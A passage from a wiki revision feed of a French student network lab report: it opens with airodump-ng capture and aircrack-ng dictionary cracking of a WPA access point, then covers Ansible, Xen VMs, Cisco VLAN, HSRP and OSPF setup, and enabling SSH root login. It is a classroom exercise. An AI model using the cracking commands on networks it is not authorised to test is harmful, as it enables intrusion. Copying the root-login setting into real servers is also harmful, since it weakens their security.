 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51992</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51992"/>
				<updated>2020-01-02T22:40:37Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* OSPF pour IPv4 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
